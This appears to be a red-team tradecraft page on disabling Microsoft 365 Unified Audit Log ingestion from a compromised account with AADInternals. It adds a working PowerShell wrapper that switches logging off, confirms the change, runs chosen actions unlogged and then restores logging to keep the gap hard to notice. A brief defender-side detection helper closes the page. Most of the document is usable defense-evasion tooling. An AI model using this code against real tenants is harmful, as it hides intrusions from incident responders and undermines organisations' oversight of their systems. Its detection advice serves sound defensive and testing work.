Disabling Auditing (Unified Audit Logs)

The Microsoft 365 Unified Audit Log aggregates audit events from across the tenant (Entra ID sign-ins and directory changes, Exchange, SharePoint, Teams and the rest), so it is the first place an incident responder goes to establish what was compromised and how the attack was carried out. If we compromise an account that can change the audit configuration, such as one holding the Compliance Administrator role, we can switch unified audit log ingestion off. The permission that actually matters is the Exchange Online "Audit Logs" role, which Microsoft assigns by default to the Organization Management and Compliance Management role groups.

Turning logging off for the whole engagement is itself a loud signal. A more careful approach is to disable ingestion only around blatantly malicious actions and re-enable it for tasks that blend in with normal user activity. Note that disabling ingestion does not delete anything already recorded; events that were ingested before the change stay searchable.

To perform this technique we need an Exchange Online access token for the compromised account, since the setting lives in Exchange Online's admin audit log configuration (the same value the native `Get-AdminAuditLogConfig` cmdlet exposes as `UnifiedAuditLogIngestionEnabled`). With AADInternals:

# get an Exchange Online token for the compromised account and cache it for the later cmdlets
PS /home/otter> Get-AADIntAccessTokenForEXO -SaveToCache
# disable ingestion; the parameter is a PowerShell boolean, so use $false rather than the bare word False
PS /home/otter> Set-AADIntUnifiedAuditLogSetting -Enable $false
# check whether the change has taken effect: UnifiedAuditLogIngestionEnabled should now read False
PS /home/otter> Get-AADIntUnifiedAuditLogSetting | Select Unified*

As the cmdlet output warns (and Microsoft's own documentation states), the change can take up to 60 minutes to take effect. Until `Get-AADIntUnifiedAuditLogSetting` reports `UnifiedAuditLogIngestionEnabled` as False, assume events are still being ingested. The same applies in reverse when re-enabling, so budget the delay on both sides of the window.
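The procedure above, wrapped so the propagation delay is handled rather than guessed at, as an added example that is not part of the original page. It composes the same AADInternals cmdlets: disable ingestion, poll the setting until it reports disabled (or give up after a bounded timeout), run a block of actions, then re-enable in a `finally` so the logging gap closes even if something throws. The helper names `Wait-UalIngestionState`, `Invoke-WithAuditLogDisabled` and `Find-UalConfigChange` are ours, not AADInternals cmdlets. It assumes a token has already been cached with `Get-AADIntAccessTokenForEXO -SaveToCache`; the defender-side helper at the end assumes a separate `Connect-ExchangeOnline` session and that the `Set-AdminAuditLogConfig` cmdlet execution was ingested before ingestion stopped, which is not guaranteed.

```powershell
function Wait-UalIngestionState {
    # Polls Get-AADIntUnifiedAuditLogSetting until UnifiedAuditLogIngestionEnabled
    # equals $Expected, or the timeout expires. Helper name is ours (hypothetical).
    param(
        [Parameter(Mandatory)][bool]$Expected,
        [int]$TimeoutMinutes = 60,   # Microsoft documents up to 60 minutes to apply
        [int]$PollSeconds    = 60
    )
    $deadline = (Get-Date).AddMinutes($TimeoutMinutes)
    do {
        $state = (Get-AADIntUnifiedAuditLogSetting).UnifiedAuditLogIngestionEnabled
        if ([bool]$state -eq $Expected) { return $true }
        Start-Sleep -Seconds $PollSeconds
    } while ((Get-Date) -lt $deadline)
    return $false
}

function Invoke-WithAuditLogDisabled {
    # Runs $Action only after ingestion is confirmed off, then restores it.
    # Assumes the cached EXO token belongs to an account allowed to change the setting.
    param([Parameter(Mandatory)][scriptblock]$Action)

    Set-AADIntUnifiedAuditLogSetting -Enable $false
    if (-not (Wait-UalIngestionState -Expected $false)) {
        # Do not proceed on an assumption: if the tenant still reports ingestion
        # enabled after the timeout, the "quiet" actions would be logged anyway.
        throw 'Unified audit log still reports ingestion enabled after timeout; aborting.'
    }
    try {
        & $Action
    }
    finally {
        # Re-enable regardless of outcome so the blind spot is as short as possible.
        Set-AADIntUnifiedAuditLogSetting -Enable $true
        [void](Wait-UalIngestionState -Expected $true)
    }
}

# Usage: replace the Write-Host with the actions that should not be logged.
Invoke-WithAuditLogDisabled -Action {
    Write-Host 'Audit log ingestion is off; run noisy actions here.'
}

function Find-UalConfigChange {
    # Defender-side check using the native Exchange Online module (Connect-ExchangeOnline first).
    # Returns who executed Set-AdminAuditLogConfig in the last $Days days, if the event
    # was ingested; the re-enable is usually the more reliable of the two events.
    param([int]$Days = 7)

    Get-AdminAuditLogConfig | Select-Object UnifiedAuditLogIngestionEnabled | Out-Host
    Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-$Days) -EndDate (Get-Date) `
        -Operations 'Set-AdminAuditLogConfig' |
        Select-Object CreationDate, UserIds, Operations, AuditData
}
```

The wrapper treats "the setting still reads enabled" as a hard stop rather than a warning, because the whole point of the technique is lost if the noisy actions are ingested anyway. On the defensive side, an alert on any `Set-AdminAuditLogConfig` execution, plus a scheduled comparison of `UnifiedAuditLogIngestionEnabled` against the expected value, catches both halves of the toggle.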
